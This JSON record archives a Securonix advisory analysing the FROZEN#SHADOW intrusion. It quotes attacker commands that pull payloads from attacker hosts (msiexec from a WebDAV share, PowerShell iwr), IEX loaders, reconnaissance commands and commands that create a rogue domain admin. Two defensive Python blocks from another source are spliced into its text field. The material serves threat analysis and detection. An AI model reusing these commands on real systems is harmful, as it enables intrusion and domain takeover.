{
	"id": "63c25533-728d-4b65-8f0c-93694f54e732",
	"created_at": "2026-04-06T00:13:07.001276Z",
	"updated_at": "2026-04-10T03:21:10.417771Z",
	"deleted_at": null,
	"sha1_hash": "f39ec26a4d5807f2b5f154a15212bd60e84b9099",
	"title": "Securonix Threat Research Security Advisory: Analysis of Ongoing FROZEN#SHADOW Attack Campaign Leveraging SSLoad Malware and RMM Software for Domain Takeover",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2367540,
	"plain_text": "Securonix Threat Research Security Advisory: Analysis of Ongoing\r\nFROZEN#SHADOW Attack Campaign Leveraging SSLoad Malware\r\nand RMM Software for Domain Takeover\r\nArchived: 2026-04-05 20:18:33 UTC\r\nBy Securonix Threat Research: D. Iuzvyk, T. Peck, O. Kolesnikov\r\ntldr:\r\nThe Securonix Threat Research team (STR) observed an interesting attack campaign which leveraged SSLoad malware\r\nand Cobalt Strike implants resulting in the attackers being able to pivot and take over the entire network domain.\r\nSSLoad malware was the primary vector deployed by threat actors during the FROZEN#SHADOW campaign along with\r\nCobalt Strike and ScreenConnect RMM (remote monitoring and management) software. SSLoad is designed to stealthily\r\ninfiltrate systems, gather sensitive information and transmit its findings back to its operators. Once inside the system,\r\nSSLoad deploys multiple backdoors and payloads to maintain persistence and avoid detection. Not to be confused with\r\nSLoader which gained traction between 2018 and 2020, SSLoader is relatively new to the malware scene.\r\nThe malware is typically introduced into the system through phishing email campaigns. Based on gathered telemetry,\r\nvictimology appears to be completely random, affecting targets in Asia, Europe and the Americas. The phishing emails\r\ncontain a single link which redirects from a mmtixmm[.]org URL to a single JavaScript file which is downloaded onto\r\nthe victim machine. Manually executing the single JavaScript file kicks off the code execution chain downloading and\r\nexecuting further stages.\r\nhttps://www.securonix.com/blog/securonix-threat-research-security-advisory-frozenshadow-attack-campaign/\r\nPage 1 of 14\n\nAfter the initial infection, the Threat Research team was able to observe the attackers installing RMM software, Cobalt\r\nStrike implants and moving laterally to other systems within the domain. 
In the end, the attackers were able to\r\ncompletely compromise the victim’s Windows domain by creating their own domain admin account.\r\nStage 1: Initial execution: JavaScript [T1059.007]\r\nThe JavaScript file out_czlrh.js boasted some interesting obfuscation methods which were used to evade antivirus\r\ndetections. As you can see in the figure below, each line of actual code was separated by massive comment blocks\r\nconsisting of randomly generated words. This amounted to thousands of lines of garbage code.\r\nThe useless comments drowned out the legitimate code so much that they caused the entropy of the file to drop\r\nsignificantly. Since they took up so much of the total code volume, the entropy looked incredibly flat when viewed in a\r\ngraph, hardly deviating from 4.478 on the Shannon entropy scale. A value this low places the script in the\r\nrange of a standard text file, not too different from the classic “Lorem ipsum” text which scores only 4.179. The practical\r\nconsequence is that high-entropy heuristics miss this sample: padding with natural-language words pulls the score toward plain\r\nprose rather than toward packed or encoded code.\r\nFigure 1: JavaScript obfuscation and entropy (out_czlrh.js)\r\nWith the comments removed, the code is much easier to understand. Aside from the huge comment blocks, no other\r\nactual code obfuscation existed in the JavaScript code. To get an idea just how much of the script consisted of\r\ncommented out lines, once they were stripped out, the file size was reduced from 835 KB to just 20 KB, a whopping\r\n97.6% reduction!\r\nFigure 2: JavaScript obfuscation cleaned and entropy (out_czlrh.js)\r\nRemoving all of the useless commented lines, the code is much more readable, allowing us to understand its intent a bit\r\nbetter. 
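The comment-padding effect described above can be reproduced at small scale. The Python below is an added example, not code from the Securonix advisory: it strips JavaScript comments with a small scanner, measures Shannon entropy before and after, and pads a constructed stand-in for the cleaned loader with random-word block comments. The stand-in script (CLEAN_JS), the word list and the numbers they produce are constructed for illustration; the advisory's own figures (835 KB to 20 KB, about 4.48 bits) describe the real out_czlrh.js.

```python
"""Comment-padding obfuscation and Shannon entropy (added example).

Not code from the Securonix advisory. CLEAN_JS is a constructed stand-in for
the de-obfuscated loader, not the real out_czlrh.js, and the word list used
for padding is invented; the byte counts and entropies it yields are therefore
illustrative, while the advisory's figures describe the real sample.
"""
import math
import random
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or single-valued input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def strip_js_comments(src: str) -> str:
    """Drop /* ... */ and // comments, leaving string literals untouched.

    A small scanner rather than a regex, so that a quoted 'http://...' is not
    mistaken for a line comment. Regex literals are not handled; the loader
    described on the page does not use any.
    """
    out, i, n, quote = [], 0, len(src), None
    while i < n:
        ch = src[i]
        if quote:                              # inside a string literal
            out.append(ch)
            if ch == '\\' and i + 1 < n:       # keep the escaped character
                out.append(src[i + 1])
                i += 1
            elif ch == quote:
                quote = None
            i += 1
        elif ch in ('"', "'"):
            quote = ch
            out.append(ch)
            i += 1
        elif src.startswith('/*', i):          # block comment: skip to '*/'
            end = src.find('*/', i + 2)
            i = n if end == -1 else end + 2
        elif src.startswith('//', i):          # line comment: keep the newline
            end = src.find('\n', i)
            i = n if end == -1 else end
        else:
            out.append(ch)
            i += 1
    return ''.join(out)


def pad_with_comments(code: str, words_per_block: int = 400, seed: int = 1) -> str:
    """Put a block comment of random dictionary-style words before every code
    line, mimicking the padding the advisory describes (constructed input)."""
    rng = random.Random(seed)
    vocab = ['alpha', 'bridge', 'cellar', 'delta', 'ember', 'fable', 'gravel',
             'harbor', 'island', 'jungle', 'kettle', 'lumber', 'meadow', 'nickel']
    padded = []
    for line in code.splitlines():
        padded.append('/* ' + ' '.join(rng.choice(vocab) for _ in range(words_per_block)) + ' */')
        padded.append(line)
    return '\n'.join(padded) + '\n'


# Constructed stand-in for the cleaned loader: object setup and a retry counter.
CLEAN_JS = (
    'var net = new ActiveXObject("WScript.Network");\n'
    'var fso = new ActiveXObject("Scripting.FileSystemObject");\n'
    'var attempts = 0, mapped = false;\n'
    'for (var i = 0; i < 5; i++) { attempts++; }\n'
)


def analyze(js: str) -> dict:
    """Size and entropy of a script before and after comment removal."""
    stripped = strip_js_comments(js)
    raw, clean = js.encode(), stripped.encode()
    return {
        'padded_bytes': len(raw),
        'stripped_bytes': len(clean),
        'padded_entropy': shannon_entropy(raw),
        'stripped_entropy': shannon_entropy(clean),
        'reduction_pct': 100.0 * (1 - len(clean) / len(raw)),
    }


if __name__ == '__main__':
    for k, v in analyze(pad_with_comments(CLEAN_JS)).items():
        print(f'{k:18} {v:.3f}' if isinstance(v, float) else f'{k:18} {v}')
```

Run as a script it prints the padded and stripped sizes and entropies side by side. The padded file lands near the entropy of ordinary prose because the lower-case words dominate the byte distribution, while the stripped code, with its mixed case, digits and punctuation, scores higher; this is the opposite of what packer-style obfuscation does and is why an entropy threshold alone does not flag a comment-padded script.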
It performs several functions to kick start next stage payloads.\r\nObject and variable initialization\r\nFirst, out_czlrh.js starts by creating instances of ActiveXObject for WScript.Network and Scripting.FileSystemObject.\r\nFor the purposes of this script, these objects will be used to interact with network drives and the local file system.\r\nWMI object: The portion of the script “GetObject(“winmgmts:\\\\\\\\.\\\\root\\\\cimv2”)” is used to access Windows\r\nManagement Instrumentation (WMI), which in this case is used so the script can perform simple command line\r\noperations.\r\nVariable setup: Variables are initialized to manage the number of connection attempts and the connection status to a\r\nnetwork share.\r\nDrive mapping and connection\r\nThe script then checks for available drive letters ranging from A to Z and tries to map a selected drive letter to a network\r\nshare located at \\\\wireoneinternet[.]info@80\\share\\ using a loop moving backwards from the letter Z. The @80 in the\r\nUNC path is the WebDAV syntax for connecting over HTTP on port 80, so the “share” is reached through the Windows WebClient\r\nservice rather than over SMB, which many perimeters block outbound.\r\nIf the script fails to map the drive after more than five attempts, it falls back to a direct “net use” command:\r\nCommand execution via WMI: Runs “net use” through WMI to try to map the network drive\r\ndirectly without any form of drive letter persistence.\r\nPersistence check: After executing the command, it waits for three seconds (while in a loop) and then checks again if\r\nthe drive is mapped.\r\nMalicious payload execution\r\nIf a drive is successfully mapped, the script constructs a command to remotely install a .msi package from the mapped\r\nnetwork drive (slack.msi) using msiexec.exe.\r\nmsiexec.exe /i \\\\wireoneinternet[.]info@80\\share\\slack.msi /qn\r\nThe /qn flag at the end of the command represents “quiet, no UI”, meaning the installation will run silently without\r\ndisplaying any user interface. 
After executing msiexec, the script then attempts to dismount the network drive.\r\nStage 2: MSI file execution [T1218.007]\r\nAfter carefully analyzing the MSI file (slack.msi), it appears to closely resemble the BazarBackdoor. This particular\r\nbackdoor often associated with the notorious TrickBot malware gang, is a sophisticated malware designed primarily to\r\ninfiltrate networks and deploy further malicious payloads. It is part of a broader set of threats that typically leads to\r\nransomware attacks, data theft, and prolonged network compromise.\r\nAfter execution, we were able to observe the malware communicating with one of the following domains depending on\r\nthe sample:\r\nwireoneinternet[.]info\r\nskinnyjeanso[.]com\r\ntitnovacrion[.]top\r\nMaramaravilha[.]com\r\nglobalsolutionunlimitedltd[.]com\r\nThe main SSLoad malware payload was then downloaded and executed. The payload consisted of a semi-randomly\r\nnamed DLL file located in \\%APPDATA%\\local\\digistamp\\mbae-api-na.dll. Once executed via Rundll32.exe, it copies\r\nitself into %APPDATA%\\Custom_update\\. It then executes it in the same manner. In our case the following file was\r\ndownloaded and executed using the following syntax:\r\nrundll32.exe “C:\\Users\\\u003credacted\u003e\\appdata\\Roaming\\Custom_update\\Update_4319e68c.dll”, homi\r\nThe file is digitally signed, however with an invalid certificate. It attempts to masquerade as Malwarebytes Anti-Exploit\r\nsoftware. 
The legitimate Malwarebytes DLL carries the same name (mbae-api-na.dll) and is typically located in\r\nC:\\Program Files\\Malwarebytes\\Anti-Malware\\mbae-api-na.dll.\r\nFigure 3: SSLoad DLL file details\r\nStage 3: Malware execution [T1218.011]\r\nAfter execution using the rundll32.exe command, the malware immediately began beaconing to two preconfigured C2\r\nservers: hxxps://skinnyjeanso[.]com/live/ and hxxps://titnovacrion[.]top/live/. It then began collecting system and user\r\ndata for both the local host as well as domain related information. We observed the malware executing the following\r\nsystem commands through cmd.exe:\r\ncmd.exe /c ipconfig /all\r\ncmd.exe /c systeminfo\r\ncmd.exe /c nltest /domain_trusts\r\ncmd.exe /c nltest /domain_trusts /all_trusts\r\ncmd.exe /c net view /all /domain\r\ncmd.exe /c net view /all\r\ncmd.exe /c net group “domain admins” /domain\r\ncmd.exe /c wmic.exe /node:localhost /namespace:\\\\root\\securitycenter2 path antivirusproduct get * /format:list\r\ncmd.exe /c net config workstation\r\ncmd.exe /c wmic.exe /node:localhost /namespace:\\\\root\\securitycenter2 path antivirusproduct get displayname | findstr\r\n/v /b /c:displayname || echo no antivirus installed\r\ncmd.exe /c whoami /groups\r\nThe data generated was then sent via the HTTPS connection back to the attacker’s C2 servers. About an hour later, the\r\nattackers appeared to have manually executed some new commands, probably after validating that they appeared to be\r\non a legitimate server and not a honeypot. 
The following commands were executed:\r\npowershell.exe -c “[console]::outputencoding = [console]::inputencoding = [system.text.encoding]::getencoding(‘utf-8’); cd\r\nc:\\; powershell”\r\nwhoami.exe /groups\r\nnet.exe group “domain admins” /dom\r\nwmic.exe /node:localhost /namespace:\\\\root\\securitycenter2 path antivirusproduct get * /format:list\r\nThe commands sent by the attackers appear to manipulate and probe the server environment to prepare for the\r\ndeployment of next-stage malicious activities. First, powershell.exe -c was used to set the console’s input and output encoding to\r\nUTF-8, which ensures that any data handled (including non-English characters) is correctly processed. After that, they\r\nswitched to the root of the C:\\ drive and started a new PowerShell session.\r\nOnce again, further enumeration of the current system and domain was conducted manually using the whoami, net and\r\nwmic commands.\r\nStage 4: Cobalt Strike execution\r\nSoon after executing manual commands on the system the attackers deployed a Cobalt Strike beacon on the system. This\r\nbecame the primary method of C2 communication between the attacker and the victim host machine.\r\nThe beacon file was dropped and executed manually via rundll32.exe using the following command:\r\nRundll32.exe C:\\ProgramData\\msedge.dll,MONSSMRpgaTQssmrpgatq\r\nWe observed the following network C2 communication originating from the Cobalt Strike beacon. 
All traffic was\r\nencrypted over port 443 (HTTPS).\r\nConnect URL | Hostname\r\nhxxps://85.239.54[.]190/ws01cs03/g | bjSdg0.pintaexoticfashion.co[.]in\r\nhxxps://23.159.160[.]88/ws01cs03/g | l1-03.winupdate.us[.]to\r\nhxxps://23.95.209[.]148/ws01cs03/g | 23-95-209-148-host.colocrossing[.]com:443\r\nThe Cobalt Strike configuration also contained the default user-agent string which is widely associated with Cobalt Strike activity\r\nand which can serve as a useful network-based indicator of compromise (note the AppleWebKit/587.38 token, which does not occur\r\nin genuine Chrome user agents and is what makes the string distinctive):\r\nMozilla/5.0 (Windows NT 6.1) AppleWebKit/587.38 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36\r\nThrough Cobalt Strike the attackers downloaded and installed a ScreenConnect RMM software instance. We’ll discuss\r\nthe RMM connection in depth further down, however we observed the following commands executed from the Cobalt\r\nStrike instance:\r\ncmd.exe /c whoami /groups\r\ncmd.exe /c wmic /node:localhost /namespace:\\\\root\\securitycenter2 path antivirusproduct get * /format:list\r\npowershell.exe /c iwr -uri “hxxps://t0talwar.screenconnect[.]com/bin/screenconnect.clientsetup.msi?e=access\u0026y=guest\u0026c=\u0026c=tjx-usa.com\u0026c=\u0026c=dc\u0026c=\u0026c=\u0026c=\u0026c=” -outfile c:\\programdata\\msedgeview.msi\r\ncmd.exe /c systeminfo\r\ncmd.exe /c msiexec.exe /i C:\\ProgramData\\Msedgeview.msi /quiet /qn\r\nThe commands first performed some general system enumeration using the whoami command as well as gathering\r\ninstalled antivirus software using wmic. Next, they proceeded to download a ScreenConnect install file from\r\nhxxps://t0talwar.screenconnect[.]com. 
The MSI installer file was downloaded and saved as\r\nC:\\ProgramData\\Msedgeview.msi and executed using msiexec.\r\nStage 5: RMM software [T1219]\r\nFor each host that the attackers pivoted to (including the domain controller) the attackers leveraged ScreenConnect (now\r\nknown as ConnectWise Control) to maintain full control of the system.\r\nDespite its legitimate uses, like many remote administration tools (RATs), ScreenConnect can be repurposed for\r\nmalicious intent. We’ve seen this several times in the past in many malicious campaigns. This level of access facilitates\r\nvarious malicious activities including screen sharing, data exfiltration, lateral movement and the deployment of\r\nadditional malware payloads.\r\nLateral movement and Windows domain takeover [TA0008]\r\nWith full access to the system the threat actors began attempting to acquire credentials and gather other critical system\r\ndetails. At this stage they started scanning the victim host for credentials stored in files as well as other potentially\r\nsensitive documents.\r\nTo enumerate the network environment, the attackers executed the Invoke-ShareFinder, Find-DomainShare and Get-DomainFileServer PowerShell cmdlets. These are functions of PowerView and were also executed\r\nthrough the ScreenConnect instance. They gather domain and network related information that can\r\nprovide valuable intel on how to pivot to other hosts in the environment. 
The Threat Research team observed its usage\r\nseveral times executed through a single PowerShell session:\r\nIEX (New-Object Net.Webclient).DownloadString(‘http://127.0.0.1:16226/’); Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\\ProgramData\\shda.txt\r\nIEX (New-Object Net.Webclient).DownloadString(‘http://127.0.0.1:52505/’); Find-DomainShare\r\nIEX (New-Object Net.Webclient).DownloadString(‘http://127.0.0.1:61390/’); Get-DomainFileServer\r\nThe 127.0.0.1 URLs show the script being served from a listener on the compromised host itself, so no external download is\r\nvisible on the network; the pattern is only recoverable from PowerShell or process command-line logging.\r\nNext, the threat actors attempted several methods of obtaining credentials. An account for a domain user was discovered\r\nand its credentials were eventually scraped by extracting them from browser credential stores.\r\nThe attackers also leveraged Cobalt Strike to extract credentials from LSASS, where they were able to obtain a domain\r\nadmin account NTLM hash. This allowed them to pivot to the network’s domain controller and eventually other critical\r\nservers including an SQL server and a mail server.\r\nWhile on the domain controller, the attackers created a new domain user using the following command. The user\r\nwas patterned after a standard service account format to help it blend in by using the “svc_” prefix.\r\ncmd.exe /c net user svc_mail pass1234@ /add /domain\r\nNext the service account was added to the domain admins group:\r\ncmd.exe /c net group “domain admins” svc_mail /add /domain\r\nWrapping up\r\nAt this stage of the attack the threat actors were able to completely compromise the domain having achieved persistence\r\nthrough RMM software and creating a malicious domain admin account. 
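Taken together, Stages 1 through 5 leave a sequence of process-creation events that host telemetry (Sysmon Event ID 1, Windows 4688 and PowerShell logging) can catch without any visibility into the TLS channels the attackers used. The Python below is an added example, not Securonix detection content and not code from the advisory: it runs a handful of rules over constructed events that mirror the command lines quoted above, including the msiexec install from a WebDAV UNC path, rundll32 loading from the staging directories, the burst of discovery commands, the loopback IEX loader and the svc_mail account being created and added to Domain Admins. Host names, timestamps, the parent process names (the ScreenConnect client service among them) and the record layout are assumptions made for the example.

```python
"""Host-telemetry rules for the FROZEN#SHADOW chain (added example).

Not code from the Securonix advisory and not Securonix detection content. The
records below are constructed to mirror the command lines quoted on the page;
host names, timestamps, parent process names (the ScreenConnect client service
among them) and the record layout are assumptions made for this example.
"""
import re
from collections import Counter, defaultdict, namedtuple
from datetime import datetime, timedelta

# One process-creation record in the shape of Sysmon EID 1 / Windows 4688 fields.
Event = namedtuple('Event', 'ts host parent image cmdline')   # image names lower case
Finding = namedtuple('Finding', 'rule host ts detail')

# Stage 1: msiexec installing straight from a WebDAV UNC path (\\host@80\share\...)
WEBDAV_MSI = re.compile(r'msiexec(\.exe)?\s+/i\s+\\\\[^\s\\]+@80\\', re.I)
# Stage 2/3: rundll32 loading a DLL out of the staging directories named on the page
STAGING_DLL = re.compile(r'\\appdata\\(roaming\\custom_update|local\\digistamp)\\[^\s"]+\.dll', re.I)
# Stage 3/4: discovery commands from the automated and the hands-on enumeration
RECON = [re.compile(p, re.I) for p in (
    r'\bnltest(\.exe)?\s+/domain_trusts', r'\bnet(\.exe)?\s+group\s+.domain admins',
    r'\bnet(\.exe)?\s+view\s+/all', r'securitycenter2\s+path\s+antivirusproduct',
    r'\bwhoami(\.exe)?\s+/groups')]
# Lateral movement: PowerView served from a loopback listener and run through IEX
LOOPBACK_IEX = re.compile(r'\bIEX\s*\(.*DownloadString\(.http://127\.0\.0\.1:\d+/', re.I)
# Domain takeover: account creation followed by Domain Admins membership
NET_USER_ADD = re.compile(r'\bnet(\.exe)?\s+user\s+(\S+)\s+\S+\s+/add\s+/domain', re.I)
NET_GROUP_DA_ADD = re.compile(r'\bnet(\.exe)?\s+group\s+.domain admins.\s+(\S+)\s+/add\s+/domain', re.I)


def detect(events, window=timedelta(minutes=5), burst=3):
    """Run the rules over `events`; return Findings in time order.

    A single discovery command is routine admin work, so the recon rule fires
    only when `burst` matching commands come from the same parent on the same
    host inside `window`, and once per burst rather than once per command.
    """
    findings, recon, created = [], defaultdict(list), {}
    for ev in sorted(events, key=lambda e: e.ts):
        cl = ev.cmdline
        if WEBDAV_MSI.search(cl):
            findings.append(Finding('msiexec_webdav_unc', ev.host, ev.ts, f'parent={ev.parent}: {cl}'))
        if ev.image == 'rundll32.exe' and STAGING_DLL.search(cl):
            findings.append(Finding('rundll32_staging_dll', ev.host, ev.ts, cl))
        if any(p.search(cl) for p in RECON):
            key = (ev.host, ev.parent)
            recon[key] = [t for t in recon[key] if ev.ts - t <= window] + [ev.ts]
            if len(recon[key]) == burst:
                findings.append(Finding('recon_burst', ev.host, ev.ts,
                                        f'{burst} discovery commands from {ev.parent} within {window}'))
        if LOOPBACK_IEX.search(cl):
            findings.append(Finding('powerview_loopback_iex', ev.host, ev.ts, cl))
        m = NET_USER_ADD.search(cl)
        if m:
            created[(ev.host, m.group(2).lower())] = ev.ts
        m = NET_GROUP_DA_ADD.search(cl)
        if m:
            user = m.group(2).lower()
            when = created.get((ev.host, user))
            age = f'; account created {int((ev.ts - when).total_seconds())}s earlier on this host' if when else ''
            findings.append(Finding('domain_admins_add', ev.host, ev.ts, f'{user} added to Domain Admins{age}'))
    return findings


def summarize(findings):
    """Number of findings per rule name."""
    return dict(Counter(f.rule for f in findings))


T0 = datetime(2024, 4, 1, 9, 0, 0)          # constructed timeline start
SC = 'screenconnect.clientservice.exe'      # assumed parent for RMM-driven commands


def at(minutes, seconds=0):
    return T0 + timedelta(minutes=minutes, seconds=seconds)


# Constructed events; the command lines follow those quoted in the advisory.
SAMPLE_EVENTS = [
    Event(at(0), 'ws01', 'wscript.exe', 'msiexec.exe',
          r'msiexec.exe /i \\wireoneinternet[.]info@80\share\slack.msi /qn'),
    Event(at(2), 'ws01', 'msiexec.exe', 'rundll32.exe',
          r'rundll32.exe "C:\Users\jdoe\appdata\Roaming\Custom_update\Update_4319e68c.dll", homi'),
    Event(at(3, 0), 'ws01', 'rundll32.exe', 'cmd.exe', 'cmd.exe /c ipconfig /all'),
    Event(at(3, 1), 'ws01', 'rundll32.exe', 'cmd.exe', 'cmd.exe /c nltest /domain_trusts'),
    Event(at(3, 2), 'ws01', 'rundll32.exe', 'cmd.exe', 'cmd.exe /c net view /all /domain'),
    Event(at(3, 3), 'ws01', 'rundll32.exe', 'cmd.exe', 'cmd.exe /c net group "domain admins" /domain'),
    Event(at(3, 4), 'ws01', 'rundll32.exe', 'cmd.exe',
          r'cmd.exe /c wmic.exe /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get * /format:list'),
    Event(at(60), 'ws01', SC, 'powershell.exe',
          "powershell.exe -c IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:16226/'); Invoke-ShareFinder -CheckShareAccess"),
    Event(at(90), 'dc01', SC, 'cmd.exe', 'cmd.exe /c net user svc_mail pass1234@ /add /domain'),
    Event(at(91), 'dc01', SC, 'cmd.exe', 'cmd.exe /c net group "domain admins" svc_mail /add /domain'),
    Event(at(120), 'admin01', 'explorer.exe', 'cmd.exe', 'cmd.exe /c whoami /groups'),  # lone check, no burst
]

if __name__ == '__main__':
    for f in detect(SAMPLE_EVENTS):
        print(f'{f.ts:%H:%M:%S} {f.host:8} {f.rule:24} {f.detail}')
```

Run as a script it prints one line per finding on the constructed timeline: five rules fire once each, and the single whoami from the admin workstation does not, because the recon rule counts a burst per host and parent rather than reacting to any one command. The account-creation rule keys the `net user ... /add /domain` on the same host so the Domain Admins addition is reported with the age of the new account; in a real deployment the key would come from the 4720 and 4728 security events instead of command lines, since the same result can be achieved from a GUI without spawning net.exe.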
With this level of access, they could get into\r\nany connected machine within the domain.\r\nIn the end, this is the worst case scenario for any organization as this level of persistence achieved by the attackers would\r\nbe incredibly time consuming and costly to remediate. However, in the end it highlights the necessity for detailed\r\nsecurity analytics and host telemetry to assist in preventing these types of infection chains before they become a much\r\nmore serious problem.\r\nSecuronix recommendations\r\nWhen it comes to successful breaches, phishing is still the #1 attack vector that threat actors are using to introduce\r\nmalware and compromise internal systems. It’s critical for front line users to be aware of the existence of these threats\r\nand how to spot them. Exercise caution around unsolicited emails, especially when the email is unexpected or employs a\r\nsense of urgency. When it comes to prevention and detection, the Securonix Threat Research team recommends:\r\nAvoid downloading files or attachments from external sources, especially if the source was unsolicited. Common\r\nfile types include zip, rar, iso, and pdf. Zip files were used during this campaign.\r\nMonitor common malware staging directories, especially script-related activity in world-writable directories. In\r\nthe case of this campaign the threat actors staged in subdirectories in C:\\ProgramData as well as the user’s\r\n%APPDATA%\r\nThrough various phases of the FROZEN#SHADOW campaign, the threat actors leveraged encrypted channels\r\nover port 443 to evade detection. Because of this, we strongly recommend deploying robust endpoint logging\r\ncapabilities. 
This includes leveraging additional process-level logging such as Sysmon and PowerShell logging\r\nfor additional log detection coverage.\r\nSecuronix customers can scan endpoints using the Securonix hunting queries below.\r\nMITRE ATT\u0026CK Matrix\r\nTactics Techniques\r\nCommand and Control\r\nT1071.002: Application Layer Protocol: File Transfer Protocols\r\nT1102: Web Service\r\nT1219: Remote Access Software\r\nT1573: Encrypted Channel\r\nDefense Evasion\r\nT1070.004: Indicator Removal: File Deletion\r\nT1218.007: System Binary Proxy Execution: Msiexec\r\nT1218.011: System Binary Proxy Execution: Rundll32\r\nDiscovery\r\nT1033: System Owner/User Discovery\r\nT1057: Process Discovery\r\nT1069.002: Permission Groups Discovery: Domain Groups\r\nT1082: System Information Discovery\r\nT1083: File and Directory Discovery\r\nT1518.001: Software Discovery: Security Software Discovery\r\nExecution\r\nT1047: Windows Management Instrumentation\r\nT1059: Command and Scripting Interpreter\r\nT1059.001: Command and Scripting Interpreter: PowerShell\r\nT1059.007: Command and Scripting Interpreter: JavaScript\r\nPersistence\r\nT1078.002: Valid Accounts: Domain Accounts\r\nRelevant provisional Securonix detections\r\nEDR-ALL-159-RU\r\nEDR-ALL-185-ER\r\nEDR-ALL-1171-ERR\r\nWEL-ALL-1179-RU,EDR-ALL-1205-RU\r\nEDR-ALL-1206-RU,WEL-ALL-1189-RU\r\nEDR-ALL-1275-ERR\r\nPSH-ALL-120-RU,EDR-ALL-1153-RU\r\nPSH-ALL-233-RU\r\nRelevant hunting queries\r\n(remove square brackets “[ ]” for IP addresses or URLs)\r\nindex = activity AND rg_functionality=”Next Generation Firewall” AND (requesturl CONTAINS\r\n“winarkamaps[.]com” OR requesturl CONTAINS “stratimasesstr[.]com” OR requesturl CONTAINS\r\n“danteshpk[.]com” OR requesturl CONTAINS “sokingscrosshotel[.]com” OR requesturl CONTAINS\r\n“kasnackamarch[.]info” OR requesturl CONTAINS 
“simplyfitphilly[.]com” OR requesturl CONTAINS\r\n“skinnyjeanso[.]com” OR requesturl CONTAINS “titnovacrion[.]top” OR requesturl CONTAINS\r\n“wireoneinternet[.]info” OR requesturl CONTAINS “t0talwar.screenconnect[.]com” OR requesturl CONTAINS\r\n“maramaravilha[.]com” OR requesturl CONTAINS “globalsolutionunlimitedltd[.]com” OR requesturl CONTAINS “krd6[.]com”)\r\nindex = activity AND rg_functionality = “Web Proxy” AND (destinationaddress = “85.239.54[.]190” OR\r\ndestinationaddress = “23.159.160[.]88” OR destinationaddress = “23.95.209[.]148” OR destinationaddress =\r\n“45.95.11[.]134”)\r\nindex = activity AND rg_functionality = “Microsoft Windows Powershell” AND message CONTAINS\r\n“Net.Webclient” AND message CONTAINS “http://127.0.0.1:” AND message CONTAINS “Out-File” AND\r\nmessage CONTAINS “IEX”\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process\r\nCreate” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR\r\ndeviceaction = “Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed Process”) AND\r\nresourcecustomfield1 CONTAINS “\\Appdata\\Roaming\\Custom_update\\” AND resourcecustomfield1\r\nCONTAINS “\\Appdata\\Local\\digistamp\\”\r\nC2 and infrastructure\r\nC2 
Address\r\n85.239.54[.]190\r\n23.159.160[.]88\r\n23.95.209[.]148\r\n45.95.11[.]134\r\nbjSdg0.pintaexoticfashion.co[.]in\r\nl1-03.winupdate.us[.]to\r\n23-95-209-148-host.colocrossing[.]com:443\r\nmmtixmm[.]org\r\nwireoneinternet[.]info\r\nskinnyjeanso[.]com\r\ntitnovacrion[.]top\r\nsimplyfitphilly[.]com\r\nkasnackamarch[.]info\r\nsokingscrosshotel[.]com\r\ndanteshpk[.]com\r\nstratimasesstr[.]com\r\nwinarkamaps[.]com\r\nglobalsolutionunlimitedltd[.]com\r\nmaramaravilha[.]com\r\nkrd6[.]com\r\nhxxps://t0talwar.screenconnect[.]com\r\nAnalyzed files/hashes\r\nFile Name SHA256\r\nout_czlrh.js DB265EA1732935F61E8D0F7A20A8ADC54E20AF71B3CF4A737714CD3377C838F6\r\nout_bdrts.js FAD25892E5179A346CDBDBBA1E40F53BD6366806D32B57FA4D7946EBE9AE8621\r\nLetter_c89_00c568610-93e92634a4425-2643w5.js F8FC9B40B946B742D6044F291914439727E1A7F53EA87562446F682B26CCE65A\r\nLetter_p64_18t678677-53r17785m9284-51810.js E8979741F0355A47DAE575EAD8C829DF47F282B4533EC1BE4D63086515F9C449\r\nLetter_h85_79o750478-05f74851h3126-2101c9.js 08E82F1C0A033AB295B4D342C53970E4528E20933C614BDA3BBC5D57BAB20651\r\nLetter_e97_58z949277-25h33503u6712-8630h9.js 4F52B4A2A781F366ED534D8C4B2FAFEF48A7848C4C20B4229B98747CA8AB06D3\r\nLetter_n95_52a858194-29r719420963-6497k0.js 68E1CAF530366B1890993185157C01161B3D625063D75A41C88D2D1BB8EDFE02\r\nLetter_n54_61h288642-67072023a7462-0068w3.js 6D7A94B7551F15732E193A07357375B98B463F0DCE6B1FED871A42FCBDDE9F48\r\nLetter_w54_49a010638-34d3814907559-826708.js 2B026343214C3D2C10FDFA9B04B7694E57EE8D3605FBF9A2E127FE6FA9A58309\r\nLetter_a51_80q687203-83q18993e4985-2463m8.js 96212917B7B0DC881332DB7ECE0BACFE21D9AC713AF1ABE078F6D3E74BAACD01\r\nLetter_k40_07w820587-40d85841n3311-9847w6.js BA3FA920708DB856737A66F70E2C7E86BBA73C73836F7F30C2CE42CD70D0C5BD\r\nLetter_w45_72u406742-64b48323u0125-6834a8.js 7DBEBB7C76511FC063B5ACE0A9359B655F66A55A494200B8FD11905C78B5FB90\r\nLetter_c41_84a683017-72b44707a1598-464809.js 6E892AA13CBD4B71A1C476207ABDDB1EF830BE04999809B4EF569488A37E47E0\r\nLetter_d94_87w030300-54q44583y8818-2571b1.js 7DFF08656413A737483ECEE2A50E412338EBFEE3D36A1A5C04E74B25949B2306\r\nLetter_n42_88u446059-37f35802c4925-3726c4.js 75DB4709428310C76656BF76F5DE267AB490E43284312B374BAF7582108300A9\r\nLetter_q50_63b944998-11n0283407179-6803z4.js C172ABD808CC6216B309BC307FE69B821C7EAED35F874FD4684AB33B4291F95A\r\nLetter_u79_20w517865-65u0451500340-7186n6.js 5FB093A9348FCF4A81BEFDA978C948796A8319FCABE7899C2CF5BA1419EC9D35\r\nDoc_k33_80c092144-18b83503a0451-2328f3.js 9FC48724CB9F70F774F7ED9E809E49979BD089DFD641896D8D5E3026F049B0AF\r\nDoc_d43_77n194090-93d18260r9745-8376n8.js 